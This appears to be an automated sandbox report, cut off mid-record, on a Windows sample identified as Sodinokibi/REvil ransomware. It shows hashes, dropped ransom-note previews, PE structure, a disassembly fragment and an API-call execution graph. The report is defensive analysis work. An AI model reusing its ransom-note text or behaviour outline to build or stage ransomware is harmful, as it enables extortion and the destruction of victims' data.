          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\bootTel.dat
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):312
          Entropy (8bit):7.407224004013357
          Encrypted:false
          SSDEEP:6:00TrhvLEca+BhUx59hC/1oXk+vYro1wANxP7GjqhT6/XKArAGyoDfAz0Q7VpVm98:00T1vLjaxA1j86ANh7HT6/XKAr54zFFN
          MD5:4D67AC14E97DE5526B2A746B6D5E47A4
          SHA1:72BD2D6BA3692D796BF84AC87359C14D8B835E57
          SHA-256:40FFA105897E5855B0FC1A8964A9FFAFF08E0314C254D146F85DC7669EC8A7E1
          SHA-512:DECE7797627085107516DA143F3C93EBD6CBA231A229FF3AA870C85C916ECC244E86C821B23F274EF83D5D0011E4E9AA3AA157C8111B323770C3F2341756812D
          Malicious:false
          Preview: z0(..P]N...*........9.Q..d....y>vZ.k9.4.....{n?.%...w`.[d.\{.c..\a.J..^kx.......gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|.......(...... .K.3.9*.D.....v...I$..I..5..........h.
          C:\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:true
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.592364626667132
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:Sample_5fba9b06c7da400016eb6275.exe
          File size:120832
          MD5:0e285f30f30dedd812295d2408f4b84c
          SHA1:24e8a7a0b9fdf929e6cc4b52b0470bf4f7b6f244
          SHA256:d91f951bdcf35012ac6b47c28cf32ec143e4269243d8c229f6cb326fd343df95
          SHA512:0e89d41a5bd1389d74e661e8f9d3efedff589c2e64f444971e349436a9b6f191f0a0d6017a1e7c28d33be382600b08d00f9496ebdfcf839943d559d1a10a8503
          SSDEEP:1536:ac79OtHXciw8MfMNQulioPIKNpVO6OICS4AziU/U/F20rg8sNlQoaA:EXCSK4IKvXhiU/+F20EVlQTA
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(\..F...F...F...C...F...E...F...B...F.|w....F.|w....F...G...F.|w....F.6.B...F.6.D...F.Rich..F.........PE..L....%._...........

          File Icon

          Icon Hash:00828e8e8686b000

          Static PE Info

          General

          Entrypoint:0x404414
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
          Time Stamp:0x5FAF25E1 [Sat Nov 14 00:33:37 2020 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:3eff7b78fa879bdd7bc10b8b899e0ab3

          Entrypoint Preview

          Instruction
          push 00000000h
          call 00007F784471AD27h
          push 00000000h
          call 00007F784471B62Ah
          pop ecx
          ret
          push ebp
          mov ebp, esp
          sub esp, 2Ch
          lea eax, dword ptr [ebp-2Ch]
          push esi
          push eax
          push 00000018h
          pop esi
          push esi
          push dword ptr [ebp+08h]
          call dword ptr [00411244h]
          test eax, eax
          je 00007F784471AF56h
          mov eax, dword ptr [ebp-1Ah]
          imul eax, dword ptr [ebp-1Ch]
          push ebx
          push edi
          xor edi, edi
          inc edi
          movzx eax, ax
          cmp ax, di
          jne 00007F784471ADC6h
          mov ebx, edi
          jmp 00007F784471ADE8h
          push 00000004h
          pop ebx
          cmp ax, bx
          jbe 00007F784471ADE0h
          push 00000008h
          pop ebx
          cmp ax, bx
          jbe 00007F784471ADD8h
          push 00000010h
          pop ebx
          cmp ax, bx
          jbe 00007F784471ADD0h
          cmp ax, si
          jnbe 00007F784471ADC8h
          mov ebx, esi
          push 00000028h
          jmp 00007F784471ADD3h
          push 00000020h
          pop ebx
          mov eax, edi
          mov cl, bl
          shl eax, cl
          lea eax, dword ptr [00000028h+eax*4]
          push eax
          push 00000040h
          call dword ptr [00411280h]
          mov esi, eax
          push 00000018h
          mov dword ptr [esi], 00000028h
          mov eax, dword ptr [ebp-28h]
          mov dword ptr [esi+04h], eax
          mov eax, dword ptr [ebp-24h]
          mov dword ptr [esi+08h], eax
          mov ax, word ptr [ebp-1Ch]
          mov word ptr [esi+0Ch], ax
          mov ax, word ptr [ebp-1Ah]
          mov word ptr [esi+0Eh], ax
          pop eax
          cmp bx, ax
          jnc 00007F784471ADC9h
          mov cl, bl
          shl edi, cl
          mov dword ptr [esi+20h], edi
          mov eax, dword ptr [esi+04h]
          xor edi, edi
          add eax, 07h
          movzx ecx, bx
          cdq
          and edx, 07h
          mov dword ptr [esi+00h], edi

          Rich Headers

          Programming Language:
          • [LNK] VS2015 UPD3.1 build 24215
          • [ C ] VS2015 UPD3.1 build 24215

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xfbd80x3c.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000x6c8.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0xd0000x30.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xb6a40xb800False0.57470703125data6.55398000813IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata0xd0000x2cd40x2e00False0.667629076087data7.79698802019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x100000x23180x1e00False0.91796875data7.62577900558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .axh0x130000xc8000xc800False0.57021484375data5.50276054743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .reloc0x200000x6c80x800False0.75146484375data6.10110704434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Imports

          DLLImport
          KERNEL32.dlllstrlenW, SetErrorMode, VerSetConditionMask, CloseHandle, GetExitCodeProcess, VerifyVersionInfoW, lstrcmpA
          OLEAUT32.dllVariantClear, VariantInit

          Network Behavior

          No network behavior found

          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          Analysis Process: Sample_5fba9b06c7da400016eb6275.exe PID: 7020 Parent PID: 5904

          General

          Start time:10:03:30
          Start date:03/12/2020
          Path:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe'
          Imagebase:0x9b0000
          File size:120832 bytes
          MD5 hash:0E285F30F30DEDD812295D2408F4B84C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.348277768.0000000002B4F000.00000004.00000040.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.348165108.0000000002B4F000.00000004.00000040.sdmp, Author: Joe Security
          • Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Author: Florian Roth
          • Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000000.347800253.00000000009B1000.00000020.00020000.sdmp, Author: Florian Roth
          Reputation:low

          Chronological Activities

          Analysis Process: unsecapp.exe PID: 5772 Parent PID: 792

          General

          Start time:10:04:53
          Start date:03/12/2020
          Path:C:\Windows\System32\wbem\unsecapp.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\wbem\unsecapp.exe -Embedding
          Imagebase:0x7ff60d110000
          File size:48640 bytes
          MD5 hash:9CBD3EC8D9E4F8CE54258B0573C66BEB
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Chronological Activities

          Disassembly

          Code Analysis

          Reset < >

            Analysis Process: Sample_5fba9b06c7da400016eb6275.exe PID: 7020 Parent PID: 5904 Sample_5fba9b06c7da400016eb6275.exeCOMMON

            Execution Graph

            Execution Coverage:32.6%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:9.8%
            Total number of Nodes:1132
            Total number of Limit Nodes:9

            Graph

            execution_graph 5267 9b1019 5268 9b5cdd 6 API calls 5267->5268 5269 9b1024 5268->5269 5270 9b494c 3 API calls 5269->5270 5271 9b103a 5269->5271 5270->5271 5372 9b6eb8 5373 9b6ed5 5372->5373 5374 9b70d1 11 API calls 5373->5374 5375 9b6eea 5374->5375 3997 9b6d7c 3998 9b6d88 3997->3998 4000 9b6da5 3998->4000 4013 9b70d1 3998->4013 4026 9b6fec 4000->4026 4003 9b6fec 11 API calls 4004 9b6e52 GetProcAddress 4003->4004 4005 9b6fec 11 API calls 4004->4005 4006 9b6e67 GetProcAddress 4005->4006 4007 9b6fec 11 API calls 4006->4007 4008 9b6e7c GetProcAddress 4007->4008 4009 9b6fec 11 API calls 4008->4009 4010 9b6e91 GetProcAddress 4009->4010 4011 9b6fec 11 API calls 4010->4011 4012 9b6ea6 GetProcAddress 4011->4012 4014 9b70f7 4013->4014 4030 9b6f2a 4014->4030 4034 9b72a6 4014->4034 4038 9b6f6f 4014->4038 4042 9b6ef1 4014->4042 4046 9b7351 4014->4046 4050 9b726d 4014->4050 4054 9b6fa7 4014->4054 4058 9b738a 4014->4058 4015 9b721b 4015->3998 4016 9b71c0 4016->4015 4062 9b6c81 4016->4062 4027 9b7009 4026->4027 4076 9b73c3 4027->4076 4031 9b6f47 4030->4031 4032 9b70d1 10 API calls 4031->4032 4033 9b6f5c LoadLibraryA 4032->4033 4033->4016 4035 9b72c3 4034->4035 4036 9b70d1 10 API calls 4035->4036 4037 9b72d8 LoadLibraryA 4036->4037 4037->4016 4039 9b6f8b 4038->4039 4040 9b70d1 10 API calls 4039->4040 4041 9b6fa0 LoadLibraryA 4040->4041 4041->4016 4043 9b6f0e 4042->4043 4044 9b70d1 10 API calls 4043->4044 4045 9b6f23 LoadLibraryA 4044->4045 4045->4016 4047 9b736e 4046->4047 4048 9b70d1 10 API calls 4047->4048 4049 9b7383 LoadLibraryA 4048->4049 4049->4016 4051 9b728a 4050->4051 4052 9b70d1 10 API calls 4051->4052 4053 9b729f LoadLibraryA 4052->4053 4053->4016 4055 9b6fc4 4054->4055 4056 9b70d1 10 API calls 4055->4056 4057 9b6fd9 LoadLibraryA 4056->4057 4057->4016 4059 9b73a7 4058->4059 4060 9b70d1 10 API calls 4059->4060 4061 9b73bc LoadLibraryA 4060->4061 4061->4016 4063 9b70d1 9 API calls 4062->4063 4064 9b6c95 LoadLibraryA 4063->4064 4065 9b6ca4 4064->4065 4067 9b6ca8 4064->4067 4065->4015 4066 9b6cda lstrcmpA 4066->4067 4068 9b6d0d 4066->4068 4067->4065 4067->4066 4068->4065 4069 9b6c81 9 API calls 4068->4069 4070 9b6d49 4069->4070 4072 9b4999 4070->4072 4075 9b4936 RtlFreeHeap 4072->4075 4074 9b49aa 4074->4065 4075->4074 4077 9b70d1 11 API calls 4076->4077 4078 9b6e3d GetProcAddress 4077->4078 4078->4003 5284 9b52d3 5285 9b5e33 5284->5285 5286 9b52f2 CreateMutexW 5285->5286 5287 9b5312 RtlGetLastWin32Error 5286->5287 5288 9b531f 5286->5288 5287->5288 5289 9b1091 5290 9b5cdd 6 API calls 5289->5290 5291 9b109f 5290->5291 5379 9b2c30 5380 9b2c41 5379->5380 5381 9b2c50 5380->5381 5382 9b4199 3 API calls 5380->5382 5382->5381 5292 9b2c57 5293 9b1dbb 21 API calls 5292->5293 5294 9b2c67 5293->5294 5299 9b2ca5 5294->5299 5303 9b3ccc 5294->5303 5296 9b2c77 5302 9b2c98 5296->5302 5317 9b7cbc 5296->5317 5297 9b4999 RtlFreeHeap 5297->5299 5301 9b4999 RtlFreeHeap 5301->5302 5302->5297 5302->5299 5304 9b3cde 5303->5304 5305 9b494c 3 API calls 5304->5305 5306 9b3ceb 5305->5306 5307 9b54cc 9 API calls 5306->5307 5316 9b40f9 5306->5316 5308 9b3e96 5307->5308 5309 9b54cc 9 API calls 5308->5309 5310 9b4020 5309->5310 5311 9b54cc 9 API calls 5310->5311 5312 9b4042 5311->5312 5313 9b4085 5312->5313 5314 9b54cc 9 API calls 5312->5314 5315 9b54cc 9 API calls 5313->5315 5314->5312 5315->5316 5316->5296 5321 9b7ce4 5317->5321 5318 9b2c90 5318->5301 5319 9b7e6e 5319->5318 5323 9b7bd5 5319->5323 5320 9b7e40 RtlGetLastWin32Error 5320->5321 5321->5318 5321->5319 5321->5320 5326 9b7bf1 5323->5326 5324 9b494c 3 API calls 5324->5326 5325 9b7c4e 5328 9b494c 3 API calls 5325->5328 5331 9b7ca7 5325->5331 5326->5324 5326->5325 5327 9b4999 RtlFreeHeap 5326->5327 5326->5331 5327->5326 5329 9b7c7f 5328->5329 5330 9b4999 RtlFreeHeap 5329->5330 5329->5331 5330->5331 5331->5318 5332 9b1116 5333 9b5cdd 6 API calls 5332->5333 5334 9b1125 5333->5334 5335 9b1145 5334->5335 5339 9b5d2f CryptStringToBinaryW 5334->5339 5338 9b4999 RtlFreeHeap 5338->5335 5340 9b5d52 5339->5340 5343 9b113a 5339->5343 5341 9b494c 3 API calls 5340->5341 5342 9b5d5b 5341->5342 5342->5343 5344 9b5d62 CryptStringToBinaryW 5342->5344 5343->5338 5344->5343 5345 9b5d80 5344->5345 5346 9b4999 RtlFreeHeap 5345->5346 5346->5343 5386 9b2d36 5387 9b2d4d 5386->5387 5389 9b2d45 5386->5389 5388 9b2d85 lstrlenW GetWindowsDirectoryW PathAddBackslashW 5387->5388 5387->5389 5388->5389 4095 9b4414 4100 9b437d 4095->4100 4097 9b441b 4130 9b4c87 ExitProcess 4097->4130 4101 9b4383 4100->4101 4131 9b1500 4101->4131 4104 9b43aa SetErrorMode 4205 9b5408 GetPEB 4104->4205 4108 9b439b 4108->4104 4270 9b4c87 ExitProcess 4108->4270 4110 9b43b7 4111 9b43c1 SHTestTokenMembership 4110->4111 4112 9b43e5 4110->4112 4111->4112 4114 9b43ce 4111->4114 4113 9b43fc 4112->4113 4206 9b52d4 4112->4206 4236 9b37a8 SetThreadExecutionState 4113->4236 4271 9b41c3 GetShellWindow GetWindowThreadProcessId 4114->4271 4119 9b4409 4119->4097 4121 9b43e0 4294 9b5162 4121->4294 4122 9b43d7 4293 9b4c87 ExitProcess 4122->4293 4123 9b43ff 4212 9b5982 GetCurrentProcess 4123->4212 4124 9b43f6 4211 9b4c87 ExitProcess 4124->4211 4306 9b1c39 4131->4306 4133 9b150f 4138 9b1568 4133->4138 4311 9bb7a2 4133->4311 4136 9b1562 4137 9b4999 RtlFreeHeap 4136->4137 4137->4138 4138->4104 4138->4108 4260 9b5204 4138->4260 4139 9b156e 4317 9b6734 4139->4317 4144 9b4999 RtlFreeHeap 4145 9b18db 4144->4145 4145->4138 4328 9b2290 4145->4328 4147 9b18ee 4378 9b5d90 CryptBinaryToStringW 4147->4378 4152 9b1975 4398 9b1c8b 4152->4398 4158 9b199c 4424 9b4c95 4158->4424 4159 9b6253 3 API calls 4159->4158 4162 9b19b9 4432 9b4dfb 4162->4432 4163 9b6253 3 API calls 4163->4162 4166 9b19d6 4443 9b4f17 4166->4443 4167 9b6253 3 API calls 4167->4166 4170 9b19f3 4172 9b5204 8 API calls 4170->4172 4171 9b6253 3 API calls 4171->4170 4173 9b19fe 4172->4173 4174 9b6253 3 API calls 4173->4174 4175 9b1a12 4174->4175 4449 9b50b3 4175->4449 4178 9b1a2f 4455 9b4cd4 4178->4455 4179 9b6253 3 API calls 4179->4178 4182 9b5d90 6 API calls 4183 9b1a4d 4182->4183 4184 9b4999 RtlFreeHeap 4183->4184 4185 9b1a58 4184->4185 4461 9b5327 GetNativeSystemInfo 4185->4461 4187 9b1a5d 4462 9b211a 4187->4462 4193 9b1a7b 4494 9b13c6 4193->4494 4196 9b13c6 3 API calls 4197 9b1b1c 4196->4197 4198 9b13c6 3 API calls 4197->4198 4199 9b1b32 4198->4199 4200 9b13c6 3 API calls 4199->4200 4201 9b1b43 4200->4201 4202 9b13c6 3 API calls 4201->4202 4203 9b1b77 4202->4203 4204 9b13c6 3 API calls 4203->4204 4204->4138 4205->4110 4207 9b52f2 CreateMutexW 4206->4207 4713 9b5e33 4206->4713 4209 9b5312 RtlGetLastWin32Error 4207->4209 4210 9b43f2 4207->4210 4209->4210 4210->4123 4210->4124 4715 9b5408 GetPEB 4212->4715 4214 9b5996 4215 9b5a72 4214->4215 4716 9b4db2 OpenProcessToken 4214->4716 4215->4113 4220 9b59c6 4726 9b56f7 ReleaseMutex 4220->4726 4225 9b59e8 4740 9b5359 4225->4740 4226 9b59e1 ExitProcess 4228 9b59ed 4229 9b5a06 GetForegroundWindow 4228->4229 4230 9b5a4d ShellExecuteExW 4229->4230 4230->4230 4231 9b5a5b 4230->4231 4232 9b4999 RtlFreeHeap 4231->4232 4233 9b5a61 4232->4233 4234 9b4999 RtlFreeHeap 4233->4234 4235 9b5a67 ExitProcess 4234->4235 4235->4215 4752 9b2b79 4236->4752 4239 9b37db CreateThread 4242 9b4bee FindCloseChangeNotification 4239->4242 5239 9b395d 4239->5239 4240 9b381e RtlAdjustPrivilege 4788 9b32a6 4240->4788 4244 9b37f1 4242->4244 4762 9b3b6e OpenSCManagerW 4244->4762 4252 9b4f8d 5 API calls 4254 9b3888 4252->4254 4253 9b4bee FindCloseChangeNotification 4255 9b381d 4253->4255 4256 9b3890 MoveFileExW 4254->4256 4258 9b38a0 4254->4258 4255->4240 4257 9b4999 RtlFreeHeap 4256->4257 4257->4258 4258->4119 4259 9b3843 4858 9b1415 4259->4858 5260 9b4a01 GetUserDefaultUILanguage GetSystemDefaultUILanguage 4260->5260 4263 9b5268 4263->4108 4264 9b5223 4265 9b494c 3 API calls 4264->4265 4266 9b522e 4265->4266 4266->4263 4267 9b5235 GetKeyboardLayoutList 4266->4267 4269 9b5241 4267->4269 4268 9b4999 RtlFreeHeap 4268->4263 4269->4263 4269->4268 4272 9b4209 4271->4272 4273 9b4210 4271->4273 4272->4121 4272->4122 5262 9b5408 GetPEB 4273->5262 4275 9b4215 OpenProcess 4275->4272 4276 9b423a 4275->4276 5263 9b5408 GetPEB 4276->5263 4278 9b423f OpenProcessToken 4278->4272 4279 9b425e DuplicateTokenEx 4278->4279 4279->4272 4280 9b4275 ConvertStringSidToSidW 4279->4280 4280->4272 4281 9b4287 4280->4281 4282 9b42ae GetLengthSid SetTokenInformation 4281->4282 4282->4272 4283 9b42dd 4282->4283 4284 9b4f8d 5 API calls 4283->4284 4285 9b42ea PathQuoteSpacesW 4284->4285 4286 